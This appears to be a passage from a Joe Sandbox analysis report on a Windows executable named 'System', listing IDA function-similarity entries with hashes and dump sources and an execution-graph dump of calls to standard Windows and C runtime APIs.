                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DefaultUsertry_get_function
                                                                                                                                                              • String ID: GetUserDefaultLocaleName
                                                                                                                                                              • API String ID: 3217810228-151340334
                                                                                                                                                              • Opcode ID: 73dbcb4227e50f5f72c2b68b34f4a744661828614cbee7425c1cea6b233ac06f
                                                                                                                                                              • Instruction ID: 5829fae4a50a8650f9b84e278175652334234fae9c1d964f40c589cfb5af740d
                                                                                                                                                              • Opcode Fuzzy Hash: 73dbcb4227e50f5f72c2b68b34f4a744661828614cbee7425c1cea6b233ac06f
                                                                                                                                                              • Instruction Fuzzy Hash: BAF0B41AB4E103D2EB145775A5C87B866716F4CF84F444037DA0E83695CE2EB884834B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C77CA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6E4C77CD1
                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FF6E4C6E104,?,?,?,?,?,?,?,?,00007FF6E4C6092A), ref: 00007FF6E4C77CEB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                                                                                              • API String ID: 539475747-3084827643
                                                                                                                                                              • Opcode ID: c3f1643d391daf8bf60c262e7bd006332af8ba13a45654221d44b6c34e84e4e1
                                                                                                                                                              • Instruction ID: 35e631aeff10eba896ecf19efaa1ff0d85b6127887e1f04ef5580241271eafc5
                                                                                                                                                              • Opcode Fuzzy Hash: c3f1643d391daf8bf60c262e7bd006332af8ba13a45654221d44b6c34e84e4e1
                                                                                                                                                              • Instruction Fuzzy Hash: E7F0902BA4A687D2EA049B61A0801746670AF4CF90F484033EA0E43795CE7EE885C74A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C77EA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DownlevelLocaleName__crttry_get_function
                                                                                                                                                              • String ID: LocaleNameToLCID
                                                                                                                                                              • API String ID: 404522899-2050040251
                                                                                                                                                              • Opcode ID: fa851c024783729c0d94a2e9fba027cb70d111ae2da4776651f9876f730b15e8
                                                                                                                                                              • Instruction ID: eb5164bd881736b78a0356ccc7920ee6b2e693a8d5b9b1a39b6b3c6b0a160f06
                                                                                                                                                              • Opcode Fuzzy Hash: fa851c024783729c0d94a2e9fba027cb70d111ae2da4776651f9876f730b15e8
                                                                                                                                                              • Instruction Fuzzy Hash: B7E0301BA4E547AAEF099775A4C42B962319F88B44F984033D60D47295CE7EEC84C20A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C77B64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6E4C77B8D
                                                                                                                                                              • TlsSetValue.KERNEL32(?,?,8000000000000000,00007FF6E4C75C8A,?,?,8000000000000000,00007FF6E4C6C85D,?,?,?,?,00007FF6E4C76B4D), ref: 00007FF6E4C77BA4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Valuetry_get_function
                                                                                                                                                              • String ID: FlsSetValue
                                                                                                                                                              • API String ID: 738293619-3750699315
                                                                                                                                                              • Opcode ID: 8ca2924fb675c7228cb8675af2f38743f6d31f8deb06c7a567f99fdc55bb12f1
                                                                                                                                                              • Instruction ID: 6a2d2e569651ff2f0d5ae5cba136464ee571f09ee4af884c93457730ef9b0a6d
                                                                                                                                                              • Opcode Fuzzy Hash: 8ca2924fb675c7228cb8675af2f38743f6d31f8deb06c7a567f99fdc55bb12f1
                                                                                                                                                              • Instruction Fuzzy Hash: C5E0306BA4E64792EE485B74E8842B42232BF48F84F584033D61D87295DE3EE884C25B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:8.6%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:0.1%
                                                                                                                                                              Total number of Nodes:1469
                                                                                                                                                              Total number of Limit Nodes:78
                                                                                                                                                              execution_graph 52920 1400055e2 52923 140014280 52920->52923 52924 1400055f5 52923->52924 52925 140039010 52923->52925 52932 140005700 52925->52932 52927 1400390b0 52965 140007a40 52927->52965 52929 1400390ba 52930 140039045 52930->52927 52964 1400700a0 100 API calls 3 library calls 52930->52964 52933 140005f52 52932->52933 52934 140005738 52932->52934 52974 140016bb4 52933->52974 52977 140016ed8 52934->52977 52938 140016ed8 56 API calls shared_ptr 52960 140005767 std::exception_ptr::_Current_exception 52938->52960 52939 140007af0 46 API calls 52939->52960 52940 140038535 VariantClear 52940->52960 52941 14000583a 52945 140038f87 52941->52945 52950 140005845 52941->52950 52942 140005c17 52988 140007af0 52942->52988 52944 1400389ca VariantClear 52944->52960 52995 1400700a0 100 API calls 3 library calls 52945->52995 52946 140038cd4 VariantClear 52946->52960 52947 140005853 52947->52930 52949 140007a40 _RunAllParam 46 API calls 52949->52950 52950->52947 52950->52949 52951 1400388ed VariantClear 52951->52960 52952 140013280 46 API calls _RunAllParam 52952->52960 52953 140038e7e 52953->52930 52954 140007a40 _RunAllParam 46 API calls 52954->52960 52955 140059370 45 API calls std::exception_ptr::_Current_exception 52955->52960 52957 140038e5f 52994 1400700a0 100 API calls 3 library calls 52957->52994 52960->52938 52960->52939 52960->52940 52960->52941 52960->52942 52960->52944 52960->52946 52960->52951 52960->52952 52960->52954 52960->52955 52960->52957 52963 1400126b0 46 API calls 52960->52963 52992 140067fa0 97 API calls 3 library calls 52960->52992 52993 140085370 97 API calls 3 library calls 52960->52993 52961 140038e74 52961->52953 52962 140007a40 _RunAllParam 46 API calls 52961->52962 52962->52953 52963->52960 52964->52927 52971 140007a5d 52965->52971 52966 140007a69 52968 14003221c 52966->52968 52969 140007a8d std::exception_ptr::_Current_exception 52966->52969 52972 140007a7b 52966->52972 52967 1400321ec VariantClear 52967->52969 53087 140013280 52968->53087 52969->52929 52971->52966 52971->52967 52972->52969 53091 140059370 45 API calls std::exception_ptr::_Current_exception 52972->53091 52996 140016aac 52974->52996 52979 140016ee3 realloc 52977->52979 52980 140016efc 52979->52980 52981 140016f02 shared_ptr 52979->52981 53012 140017ca8 52979->53012 52980->52960 52982 140016f49 52981->52982 52985 140016bb4 _cinit 55 API calls 52981->52985 53025 14001eb88 45 API calls 2 library calls 52982->53025 52984 140016f5a 53026 14001ecac RaiseException __initmbctable 52984->53026 52985->52982 52987 140016f70 52989 140007b02 52988->52989 52991 140007b14 52988->52991 52990 140007a40 _RunAllParam 46 API calls 52989->52990 52990->52991 52991->52950 52992->52960 52993->52960 52994->52961 52995->52953 53011 140016ff8 52996->53011 53013 140017d3c realloc 53012->53013 53019 140017cc0 realloc 53012->53019 53069 14001eae4 45 API calls _getptd 53013->53069 53014 140017cf8 RtlAllocateHeap 53016 140017d31 53014->53016 53014->53019 53016->52979 53018 140017d21 53067 14001eae4 45 API calls _getptd 53018->53067 53019->53014 53019->53018 53022 140017d26 53019->53022 53027 14001ef68 45 API calls _FF_MSGBANNER 53019->53027 53028 14001ed40 53019->53028 53064 140016fe0 53019->53064 53068 14001eae4 45 API calls _getptd 53022->53068 53025->52984 53026->52987 53027->53019 53029 14001ed63 53028->53029 53030 14001ef4f 53029->53030 53070 14002a284 45 API calls 2 library calls 53029->53070 53030->53019 53032 14001ed85 53033 14001ef0a GetStdHandle 53032->53033 53071 14002a284 45 API calls 2 library calls 53032->53071 53033->53030 53035 14001ef1d 53033->53035 53035->53030 53037 14001ef23 __wtomb_environ 53035->53037 53036 14001ed98 53036->53033 53038 14001eda9 53036->53038 53040 14001ef33 WriteFile 53037->53040 53038->53030 53039 14001edb5 53038->53039 53072 140029fa0 45 API calls 2 library calls 53039->53072 53040->53030 53042 14001edd4 53043 14001eded GetModuleFileNameA 53042->53043 53073 14001e8ec 6 API calls 2 library calls 53042->53073 53045 14001ee3e __wtomb_environ 53043->53045 53046 14001ee0d 53043->53046 53049 14001ee99 53045->53049 53076 140029ec8 45 API calls 2 library calls 53045->53076 53074 140029fa0 45 API calls 2 library calls 53046->53074 53048 14001ee25 53048->53045 53075 14001e8ec 6 API calls 2 library calls 53048->53075 53078 140029e3c 45 API calls 2 library calls 53049->53078 53052 14001eeab 53054 14001eec4 53052->53054 53079 14001e8ec 6 API calls 2 library calls 53052->53079 53080 140029e3c 45 API calls 2 library calls 53054->53080 53057 14001ee80 53057->53049 53077 14001e8ec 6 API calls 2 library calls 53057->53077 53058 14001eeda 53059 14001eef3 53058->53059 53081 14001e8ec 6 API calls 2 library calls 53058->53081 53082 14002a090 16 API calls _FF_MSGBANNER 53059->53082 53063 14001ef08 53063->53030 53083 140016fa4 GetModuleHandleW 53064->53083 53067->53022 53068->53016 53069->53016 53070->53032 53071->53036 53072->53042 53073->53043 53074->53048 53075->53045 53076->53057 53077->53049 53078->53052 53079->53054 53080->53058 53081->53059 53082->53063 53084 140016fd7 ExitProcess 53083->53084 53085 140016fbe GetProcAddress 53083->53085 53085->53084 53086 140016fd3 53085->53086 53086->53084 53088 140013297 53087->53088 53089 14001328a 53087->53089 53088->52969 53092 1400131c0 53089->53092 53091->52969 53093 14001322f 53092->53093 53094 1400131ce 53092->53094 53093->53088 53094->53093 53096 140013190 53094->53096 53097 140007a40 _RunAllParam 46 API calls 53096->53097 53098 1400131a4 53097->53098 53098->53094 53099 14001d2a8 GetStartupInfoW 53100 14001d2cf 53099->53100 53137 140020ca8 HeapCreate 53100->53137 53103 14001d371 53140 14001d88c 53103->53140 53104 14001d35d 53107 14001ed40 _FF_MSGBANNER 45 API calls 53104->53107 53110 14001d367 53107->53110 53112 140016fe0 malloc 3 API calls 53110->53112 53112->53103 53138 140020ccc HeapSetInformation 53137->53138 53139 14001d34b 53137->53139 53138->53139 53139->53103 53139->53104 53234 14001ef68 45 API calls _FF_MSGBANNER 53139->53234 53236 1400172f4 53140->53236 53234->53104 53252 14001d560 EncodePointer 53236->53252 54803 140092bb0 54804 14000fd50 shared_ptr 56 API calls 54803->54804 54805 140092bf7 54804->54805 54838 140012d80 54805->54838 54807 140092c06 54811 140092d53 54807->54811 54813 140092c3e 54807->54813 54831 140092d3b 54807->54831 54808 140062160 95 API calls 54809 140092e30 std::exception_ptr::_Current_exception 54808->54809 54879 1400024b0 46 API calls _RunAllParam 54809->54879 54816 140092dba StringFromIID 54811->54816 54811->54831 54814 140092c6e StringFromCLSID 54813->54814 54815 140092c83 54813->54815 54813->54831 54814->54815 54818 140015220 56 API calls 54815->54818 54815->54831 54817 140092dd1 54816->54817 54816->54831 54819 140015220 56 API calls 54817->54819 54820 140092c96 CoTaskMemFree 54818->54820 54821 140092dde CoTaskMemFree 54819->54821 54822 140092cb0 54820->54822 54820->54831 54824 1400107e0 shared_ptr 56 API calls 54821->54824 54823 1400107e0 shared_ptr 56 API calls 54822->54823 54825 140092cc1 54823->54825 54826 140092e00 54824->54826 54846 1400117b0 56 API calls 2 library calls 54825->54846 54878 1400117b0 56 API calls 2 library calls 54826->54878 54829 140092e0d 54830 1400926b0 107 API calls 54829->54830 54830->54831 54831->54808 54832 140092cce 54837 140092cf5 54832->54837 54847 1400926b0 54832->54847 54833 1400926b0 107 API calls 54833->54831 54837->54831 54837->54833 54839 140007a40 _RunAllParam 46 API calls 54838->54839 54840 140012d95 54839->54840 54841 140016ed8 shared_ptr 56 API calls 54840->54841 54843 140012da6 54841->54843 54842 140032aa0 54843->54842 54844 140001d30 shared_ptr 56 API calls 54843->54844 54845 140012dba 54844->54845 54845->54807 54846->54832 54848 14000fd50 shared_ptr 56 API calls 54847->54848 54849 1400926f6 54848->54849 54850 1400107e0 shared_ptr 56 API calls 54849->54850 54851 140092707 54850->54851 54880 1400117b0 56 API calls 2 library calls 54851->54880 54853 140092714 54854 140092737 54853->54854 54950 1400117b0 56 API calls 2 library calls 54853->54950 54856 140011910 56 API calls 54854->54856 54858 140092746 54856->54858 54857 14009272a 54951 1400117b0 56 API calls 2 library calls 54857->54951 54881 1400049b0 56 API calls 2 library calls 54858->54881 54861 140092755 54862 140007a40 _RunAllParam 46 API calls 54861->54862 54863 14009275f 54862->54863 54864 140011910 56 API calls 54863->54864 54865 140092770 54864->54865 54882 1400049b0 56 API calls 2 library calls 54865->54882 54867 14009277f 54868 140007a40 _RunAllParam 46 API calls 54867->54868 54869 140092789 54868->54869 54883 14007e830 54869->54883 54878->54829 54880->54853 54881->54861 54882->54867 54884 14000fd50 shared_ptr 56 API calls 54883->54884 54885 14007e865 54884->54885 54886 14000fd50 shared_ptr 56 API calls 54885->54886 54887 14007e86f 54886->54887 54888 14000fd50 shared_ptr 56 API calls 54887->54888 54889 14007e87c 54888->54889 54890 140012d80 57 API calls 54889->54890 54891 14007e88b 54890->54891 54953 140062190 54891->54953 54894 140001d30 shared_ptr 56 API calls 54895 14007e8a7 54894->54895 54957 140075290 54895->54957 54950->54857 54951->54854 54954 14006219f 54953->54954 54955 1400621ab 54953->54955 54954->54955 54981 140061f90 95 API calls 3 library calls 54954->54981 54955->54894 54958 1400107e0 shared_ptr 56 API calls 54957->54958 54959 1400752c0 54958->54959 54960 1400107e0 shared_ptr 56 API calls 54959->54960 54961 1400752cb 54960->54961 54962 1400107e0 shared_ptr 56 API calls 54961->54962 54963 1400752d8 54962->54963 54964 14007534d 54963->54964 54965 140002170 56 API calls 54963->54965 54966 1400107e0 shared_ptr 56 API calls 54964->54966 54967 1400752e9 54965->54967 54968 14007534b 54966->54968 54967->54964 54969 140002170 56 API calls 54967->54969 54972 140072750 56 API calls 54968->54972 54970 1400752fc 54969->54970 54970->54964 54971 140075302 54970->54971 54982 1400021b0 56 API calls 2 library calls 54971->54982 54974 140075385 54972->54974 54975 140072750 56 API calls 54974->54975 54976 1400753a0 shared_ptr 54975->54976 54977 140075310 54983 140072750 54977->54983 54979 14007533d 54995 1400021b0 56 API calls 2 library calls 54979->54995 54981->54955 54982->54977 54984 140072814 54983->54984 54985 140072780 54983->54985 54997 1400021b0 56 API calls 2 library calls 54984->54997 54985->54984 54988 14007278a 54985->54988 54987 1400727e3 __initmbctable 54987->54979 54989 1400727e8 54988->54989 54990 1400727b1 54988->54990 54996 14000fed0 56 API calls shared_ptr 54989->54996 54991 1400118e0 shared_ptr 56 API calls 54990->54991 54993 1400727bc shared_ptr 54991->54993 54994 140016ed8 shared_ptr 56 API calls 54993->54994 54994->54987 54995->54968 54996->54987 54997->54987 54999 140086ef0 55000 140062190 95 API calls 54999->55000 55001 140086f21 55000->55001 55002 140062160 95 API calls 55001->55002 55003 140086f31 55002->55003 55004 140062190 95 API calls 55003->55004 55005 140086f42 55004->55005 55006 140062160 95 API calls 55005->55006 55007 140086f55 55006->55007 55067 140011880 55007->55067 55009 140086f6a 55010 140086fba 55009->55010 55031 140087049 55009->55031 55011 140012b40 57 API calls 55010->55011 55012 140086fd2 55011->55012 55014 140011400 57 API calls 55012->55014 55044 140086ff2 55012->55044 55013 140087055 55016 140087369 55013->55016 55017 1400873ad 55013->55017 55021 140086fe7 55014->55021 55015 140062190 95 API calls 55022 1400870d9 55015->55022 55023 140012b40 57 API calls 55016->55023 55020 140012b40 57 API calls 55017->55020 55018 140087044 std::exception_ptr::_Current_exception 55019 1400870e8 55019->55013 55035 140087137 55019->55035 55024 1400873b8 55020->55024 55025 140007a40 _RunAllParam 46 API calls 55021->55025 55026 140062160 95 API calls 55022->55026 55027 140087371 55023->55027 55029 140011400 57 API calls 55024->55029 55025->55044 55026->55019 55030 140062160 95 API calls 55027->55030 55028 140002900 56 API calls 55028->55044 55033 1400873c8 55029->55033 55034 140087385 55030->55034 55031->55013 55031->55015 55031->55019 55032 140011400 57 API calls 55032->55044 55036 140007a40 _RunAllParam 46 API calls 55033->55036 55037 140002900 56 API calls 55034->55037 55040 140087151 55035->55040 55041 140087162 55035->55041 55042 1400873d3 55036->55042 55038 140087398 55037->55038 55043 140011400 57 API calls 55038->55043 55039 140013120 57 API calls 55039->55044 55045 140012b40 57 API calls 55040->55045 55046 140012b40 57 API calls 55041->55046 55047 140011400 57 API calls 55042->55047 55048 1400873a8 55043->55048 55044->55018 55044->55028 55044->55032 55044->55039 55049 140087159 55045->55049 55050 14008716c 55046->55050 55051 1400873ed 55047->55051 55055 140013120 57 API calls 55048->55055 55054 1400107e0 shared_ptr 56 API calls 55049->55054 55052 140011400 57 API calls 55050->55052 55053 140062160 95 API calls 55051->55053 55056 14008717c 55052->55056 55057 140087404 55053->55057 55063 1400871b8 55054->55063 55055->55018 55058 140007a40 _RunAllParam 46 API calls 55056->55058 55059 140002900 56 API calls 55057->55059 55058->55049 55059->55048 55063->55018 55064 1400107e0 shared_ptr 56 API calls 55063->55064 55065 140011400 57 API calls 55063->55065 55066 140013120 57 API calls 55063->55066 55072 140002900 55063->55072 55081 140017acc 47 API calls 2 library calls 55063->55081 55082 1400037e0 56 API calls 2 library calls 55063->55082 55064->55063 55065->55063 55066->55063 55068 140016ed8 shared_ptr 56 API calls 55067->55068 55069 1400118b5 55068->55069 55070 1400118e0 shared_ptr 56 API calls 55069->55070 55071 1400118c3 55070->55071 55071->55009 55073 140002946 55072->55073 55074 14000290e 55072->55074 55078 140002950 __initmbctable 55073->55078 55079 140016ed8 shared_ptr 56 API calls 55073->55079 55074->55073 55075 1400334e0 55074->55075 55076 1400118e0 shared_ptr 56 API calls 55075->55076 55077 1400334e7 shared_ptr 55076->55077 55080 140016ed8 shared_ptr 56 API calls 55077->55080 55078->55063 55079->55078 55080->55078 55081->55063 55082->55063 55083 1400381eb 55090 1400047b0 55083->55090 55085 1400381f8 55101 140084700 55085->55101 55087 140038250 55111 1400700a0 100 API calls 3 library calls 55087->55111 55089 140038e40 55091 1400047c6 55090->55091 55092 1400047dc 55090->55092 55093 140007af0 46 API calls 55091->55093 55094 1400047e2 55092->55094 55095 1400047fd 55092->55095 55097 1400047ce 55093->55097 55098 140007af0 46 API calls 55094->55098 55096 140016ed8 shared_ptr 56 API calls 55095->55096 55100 14000480c 55096->55100 55097->55085 55099 1400047eb 55098->55099 55099->55085 55100->55085 55102 140084747 _fread_nolock 55101->55102 55103 140001d30 shared_ptr 56 API calls 55102->55103 55109 1400847ff std::exception_ptr::_Current_exception 55102->55109 55104 1400847af 55103->55104 55112 140004740 56 API calls std::exception_ptr::_Current_exception 55104->55112 55106 1400847c7 55107 140010580 56 API calls 55106->55107 55108 1400847ed 55107->55108 55108->55109 55110 140007af0 46 API calls 55108->55110 55109->55087 55110->55109 55111->55089 55112->55106 55113 14006d8b0 55114 140062190 95 API calls 55113->55114 55115 14006d8c5 SetCurrentDirectoryW 55114->55115 55116 14006d8da 55115->55116 55117 14006d8d2 55115->55117 55118 140007a40 _RunAllParam 46 API calls 55117->55118 55118->55116 55119 140017130 55120 14001f1bc _lock 45 API calls 55119->55120 55121 14001715e 55120->55121 55122 140017185 DecodePointer 55121->55122 55127 140017241 _initterm 55121->55127 55126 1400171a2 DecodePointer 55122->55126 55122->55127 55124 1400172a2 55125 140017277 55125->55124 55141 14001f0bc LeaveCriticalSection 55125->55141 55129 1400171c6 55126->55129 55127->55125 55143 14001f0bc LeaveCriticalSection 55127->55143 55129->55127 55132 1400171e5 DecodePointer 55129->55132 55142 14001d560 EncodePointer 55129->55142 55140 14001d560 EncodePointer 55132->55140 55144 140084b28 55145 140084aa3 SHGetFolderPathW 55144->55145 55146 140084abe 55145->55146 55146->55145 55147 14003a231 55150 140095d90 55147->55150 55151 140095e6e 55150->55151 55152 140095e24 55150->55152 55153 14000fd50 shared_ptr 56 API calls 55151->55153 55154 140095e5b 55152->55154 55155 140095e2b 55152->55155 55170 140095e78 _fread_nolock 55153->55170 55181 140095860 55154->55181 55157 140095e30 55155->55157 55158 140095e48 55155->55158 55157->55151 55159 140095e35 55157->55159 55203 140095060 107 API calls 5 library calls 55158->55203 55202 1400940c0 108 API calls 3 library calls 55159->55202 55162 140012600 56 API calls 55162->55170 55163 140007a40 _RunAllParam 46 API calls 55165 14009649e 55163->55165 55167 140007a40 _RunAllParam 46 API calls 55165->55167 55166 140095e43 std::exception_ptr::_Current_exception 55166->55163 55168 14003a24a 55167->55168 55169 140012d80 57 API calls 55169->55170 55170->55162 55170->55166 55170->55169 55172 140010580 56 API calls 55170->55172 55174 140005700 107 API calls 55170->55174 55175 1400963f5 55170->55175 55177 140007af0 46 API calls 55170->55177 55179 140012b40 57 API calls 55170->55179 55204 140082f90 55170->55204 55208 1400625a0 56 API calls 55170->55208 55209 140015e60 57 API calls 55170->55209 55210 14008b1c0 57 API calls 55170->55210 55211 140094e40 107 API calls _RunAllParam 55170->55211 55172->55170 55174->55170 55212 1400700a0 100 API calls 3 library calls 55175->55212 55177->55170 55179->55170 55182 1400958bf 55181->55182 55183 1400958d1 55181->55183 55182->55183 55185 1400958c4 55182->55185 55184 14000fd50 shared_ptr 56 API calls 55183->55184 55197 1400958db _fread_nolock 55184->55197 55213 1400940c0 108 API calls 3 library calls 55185->55213 55187 140012600 56 API calls 55187->55197 55188 140007a40 _RunAllParam 46 API calls 55189 140095d68 55188->55189 55189->55166 55191 140095cbc 55216 1400700a0 100 API calls 3 library calls 55191->55216 55192 1400958cc std::exception_ptr::_Current_exception 55192->55188 55193 140012d80 57 API calls 55193->55197 55194 140082f90 57 API calls 55194->55197 55195 140010580 56 API calls 55195->55197 55196 140005700 107 API calls 55196->55197 55197->55187 55197->55191 55197->55192 55197->55193 55197->55194 55197->55195 55197->55196 55199 140007af0 46 API calls 55197->55199 55201 140012b40 57 API calls 55197->55201 55214 140015e60 57 API calls 55197->55214 55215 140094e40 107 API calls _RunAllParam 55197->55215 55199->55197 55201->55197 55202->55166 55203->55166 55207 140082fb0 55204->55207 55205 14008300b 55205->55170 55206 14000f9e0 57 API calls 55206->55205 55207->55205 55207->55206 55208->55170 55209->55170 55210->55170 55211->55170 55212->55166 55213->55192 55214->55197 55215->55197 55216->55192 55217 1400055b5 55220 140010050 55217->55220 55221 14001007b 55220->55221 55222 1400100cc 55221->55222 55223 1400390d0 55221->55223 55225 140010580 56 API calls 55222->55225 55350 1400700a0 100 API calls 3 library calls 55223->55350 55226 140010143 55225->55226 55228 1400101c0 55226->55228 55230 140007a40 _RunAllParam 46 API calls 55226->55230 55227 1400390e2 55229 140007a40 _RunAllParam 46 API calls 55227->55229 55234 1400101d2 55228->55234 55235 14003912a 55228->55235 55249 14001046b 55228->55249 55231 1400390ec 55229->55231 55232 14001015e 55230->55232 55233 140007a40 _RunAllParam 46 API calls 55231->55233 55236 140039100 55232->55236 55237 140010178 55232->55237 55240 1400390f6 55233->55240 55238 1400391a6 55234->55238 55241 1400101f3 55234->55241 55235->55238 55239 14003914a 55235->55239 55252 14000f9e0 57 API calls 55236->55252 55242 14000f9e0 57 API calls 55237->55242 55247 140005700 107 API calls 55238->55247 55238->55249 55352 140010660 107 API calls _RunAllParam 55239->55352 55351 140013ae0 46 API calls _RunAllParam 55240->55351 55245 140005700 107 API calls 55241->55245 55248 140010194 55242->55248 55250 14001021c 55245->55250 55251 1400391eb 55247->55251 55253 140010580 56 API calls 55248->55253 55254 140039477 std::exception_ptr::_Current_exception 55249->55254 55362 1400700a0 100 API calls 3 library calls 55249->55362 55250->55254 55255 140007af0 46 API calls 55250->55255 55251->55254 55257 140039209 55251->55257 55260 140007af0 46 API calls 55251->55260 55252->55235 55253->55228 55256 140007a40 _RunAllParam 46 API calls 55254->55256 55258 140010231 55255->55258 55259 140039584 55256->55259 55261 1400392d3 55257->55261 55353 140015e60 57 API calls 55257->55353 55258->55249 55265 140005700 107 API calls 55258->55265 55262 140007a40 _RunAllParam 46 API calls 55259->55262 55260->55257 55354 14008cdc0 120 API calls 2 library calls 55261->55354 55266 14003958e 55262->55266 55268 140010287 55265->55268 55363 140013ae0 46 API calls _RunAllParam 55266->55363 55267 14003930a 55267->55249 55271 140007a40 _RunAllParam 46 API calls 55267->55271 55268->55254 55272 140007af0 46 API calls 55268->55272 55273 14001029e 55271->55273 55272->55273 55274 1400102b8 55273->55274 55278 140039354 55273->55278 55277 140007a40 _RunAllParam 46 API calls 55274->55277 55275 140039294 55279 140012d80 57 API calls 55275->55279 55276 140039222 55276->55275 55286 140011400 57 API calls 55276->55286 55280 1400102c5 55277->55280 55281 140005700 107 API calls 55278->55281 55282 1400392a9 55279->55282 55287 1400393a7 55280->55287 55288 1400102e5 55280->55288 55283 140039387 55281->55283 55284 140007a40 _RunAllParam 46 API calls 55282->55284 55283->55254 55289 140007af0 46 API calls 55283->55289 55285 1400392b3 55284->55285 55290 140007a40 _RunAllParam 46 API calls 55285->55290 55291 140039266 55286->55291 55355 140061d70 46 API calls _RunAllParam 55287->55355 55293 1400393af 55288->55293 55300 1400102f3 55288->55300 55289->55280 55290->55261 55291->55275 55295 140011400 57 API calls 55291->55295 55356 140061d70 46 API calls _RunAllParam 55293->55356 55296 14003927a 55295->55296 55297 140007af0 46 API calls 55296->55297 55298 140039285 55297->55298 55299 140007af0 46 API calls 55298->55299 55299->55275 55300->55249 55300->55254 55301 1400393e4 55300->55301 55302 14001039a 55300->55302 55303 1400394be 55301->55303 55305 140007a40 _RunAllParam 46 API calls 55301->55305 55302->55303 55304 1400103a8 55302->55304 55306 140007a40 _RunAllParam 46 API calls 55303->55306 55307 140007a40 _RunAllParam 46 API calls 55304->55307 55308 1400393fc 55305->55308 55309 1400394db 55306->55309 55310 1400103b2 55307->55310 55312 140007a40 _RunAllParam 46 API calls 55308->55312 55359 140011370 57 API calls shared_ptr 55309->55359 55347 1400108a0 98 API calls 55310->55347 55315 140039413 55312->55315 55314 1400103d6 55316 1400394ff 55314->55316 55348 140011b10 98 API calls 55314->55348 55357 14008eb90 140 API calls 2 library calls 55315->55357 55360 140079bd0 98 API calls 55316->55360 55320 140039435 55326 140039447 55320->55326 55327 14003948e 55320->55327 55321 140039529 55321->55249 55361 140011370 57 API calls shared_ptr 55321->55361 55322 1400103eb 55322->55316 55323 1400103f3 55322->55323 55349 140011370 57 API calls shared_ptr 55323->55349 55330 140012d80 57 API calls 55326->55330 55328 140007af0 46 API calls 55327->55328 55331 14003949b 55328->55331 55329 140010404 std::exception_ptr::_Current_exception 55336 140007a40 _RunAllParam 46 API calls 55329->55336 55332 140039456 55330->55332 55333 